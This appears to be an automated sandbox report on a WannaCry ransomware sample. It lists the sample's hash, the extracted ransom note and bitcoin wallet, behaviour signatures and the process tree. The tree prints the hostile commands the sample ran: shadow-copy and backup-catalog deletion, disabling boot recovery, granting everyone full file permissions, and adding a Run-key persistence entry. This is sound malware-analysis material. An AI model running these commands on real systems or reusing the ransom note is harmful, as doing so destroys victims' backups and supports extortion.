Resubmissions
13-04-2021 15:20
210413-erpdk5746n 1007-04-2021 20:23
210407-3w1xnp3sxx 1030-03-2021 12:44
210330-rxae2gpzkn 1015-03-2021 03:56
210315-v77jkyypdj 1012-03-2021 14:39
210312-v91t4rfeva 1009-03-2021 16:31
210309-jarv33yz26 1008-03-2021 18:16
210308-nb95m4v9c6 1004-03-2021 16:33
210304-wah1ytdaa6 1004-03-2021 15:26
210304-v2jw3mqwkj 1003-03-2021 02:26
210303-eg4g1z4wd2 10Analysis
-
max time kernel
146s -
resource
win10v191014 -
submitted
09-01-2020 12:33
Task
task1
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win7v191014
0 signatures
Task
task2
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win10v191014
0 signatures
General
-
Target
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
-
Sample
200109-ta3m1dkh6n
-
SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Signatures
-
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 3732 @[email protected] 4268 @[email protected] 4972 @[email protected] 4168 @[email protected] 740 @[email protected] 3200 @[email protected] -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] Set value (str) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Adds Run entry to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\nmsqcsinudawe237 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" reg.exe -
Executes dropped EXE 16 IoCs
pid Process 4532 taskdl.exe 4268 @[email protected] 3732 @[email protected] 4956 taskse.exe 4972 @[email protected] 4644 taskdl.exe 716 taskhsvc.exe 4216 taskdl.exe 4192 taskse.exe 4168 @[email protected] 5092 taskdl.exe 1612 taskse.exe 740 @[email protected] 4732 taskse.exe 3200 @[email protected] 2600 taskdl.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 716 taskhsvc.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5064 attrib.exe -
Loads dropped DLL 1 IoCs
pid Process 716 taskhsvc.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3776 reg.exe -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Modifies file permissions 1 TTPs 1 IoCs
pid Process 5072 icacls.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
description pid Process Token: SeTcbPrivilege 4956 taskse.exe Token: SeBackupPrivilege 4704 vssvc.exe Token: SeRestorePrivilege 4704 vssvc.exe Token: SeAuditPrivilege 4704 vssvc.exe Token: SeIncreaseQuotaPrivilege 2840 WMIC.exe Token: SeSecurityPrivilege 2840 WMIC.exe Token: SeTakeOwnershipPrivilege 2840 WMIC.exe Token: SeLoadDriverPrivilege 2840 WMIC.exe Token: SeSystemProfilePrivilege 2840 WMIC.exe Token: SeSystemtimePrivilege 2840 WMIC.exe Token: SeProfSingleProcessPrivilege 2840 WMIC.exe Token: SeIncBasePriorityPrivilege 2840 WMIC.exe Token: SeCreatePagefilePrivilege 2840 WMIC.exe Token: SeBackupPrivilege 2840 WMIC.exe Token: SeRestorePrivilege 2840 WMIC.exe Token: SeShutdownPrivilege 2840 WMIC.exe Token: SeDebugPrivilege 2840 WMIC.exe Token: SeSystemEnvironmentPrivilege 2840 WMIC.exe Token: SeRemoteShutdownPrivilege 2840 WMIC.exe Token: SeUndockPrivilege 2840 WMIC.exe Token: SeManageVolumePrivilege 2840 WMIC.exe Token: 33 2840 WMIC.exe Token: 34 2840 WMIC.exe Token: 35 2840 WMIC.exe Token: 36 2840 WMIC.exe Token: SeTcbPrivilege 4192 taskse.exe Token: SeTcbPrivilege 1612 taskse.exe Token: SeTcbPrivilege 4732 taskse.exe -
Drops startup file 6 IoCs
description ioc Process File created (read-only) C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDBC3E.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDBC3E.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File deleted C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDBC3E.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created (read-only) C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDBC54.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDBC54.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File deleted C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDBC54.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Deletes shadow copies 2 TTPs 2 IoCs
pid Process 4460 vssadmin.exe 2840 WMIC.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 5036 wrote to memory of 5064 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 72 PID 5036 wrote to memory of 5072 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 73 PID 5036 wrote to memory of 4532 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 77 PID 5036 wrote to memory of 4612 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 78 PID 4612 wrote to memory of 3672 4612 cmd.exe 80 PID 5036 wrote to memory of 4268 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 88 PID 5036 wrote to memory of 3984 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 89 PID 3984 wrote to memory of 3732 3984 cmd.exe 91 PID 5036 wrote to memory of 4956 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 92 PID 5036 wrote to memory of 4972 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 93 PID 5036 wrote to memory of 4980 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 94 PID 5036 wrote to memory of 4644 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 96 PID 4980 wrote to memory of 3776 4980 cmd.exe 98 PID 4268 wrote to memory of 716 4268 @[email protected] 99 PID 3732 wrote to memory of 4624 3732 @[email protected] 101 PID 4624 wrote to memory of 4460 4624 cmd.exe 103 PID 4624 wrote to memory of 2840 4624 cmd.exe 105 PID 5036 wrote to memory of 4216 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 108 PID 5036 wrote to memory of 4192 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 109 PID 5036 wrote to memory of 4168 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 110 PID 5036 wrote to memory of 5092 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 114 PID 5036 wrote to memory of 1612 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 115 PID 5036 wrote to memory of 740 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 116 PID 5036 wrote to memory of 4732 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 123 PID 5036 wrote to memory of 3200 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 124 PID 5036 wrote to memory of 2600 5036 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 125
Processes
-
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Sets desktop wallpaper using registry
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
PID:5064
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5072
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 192951578576850.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵PID:3672
-
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
PID:716
-
-
-
C:\Windows\SysWOW64\cmd.exePID:3984
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Deletes shadow copies
PID:4460
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
- Deletes shadow copies
PID:2840
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4956
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Suspicious use of SetWindowsHookEx
- Sets desktop wallpaper using registry
- Executes dropped EXE
PID:4972
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nmsqcsinudawe237" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nmsqcsinudawe237" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f3⤵
- Adds Run entry to start application
- Modifies registry key
PID:3776
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4644
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4216
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:4168
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5092
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:740
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4732
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:3200
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2600
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4704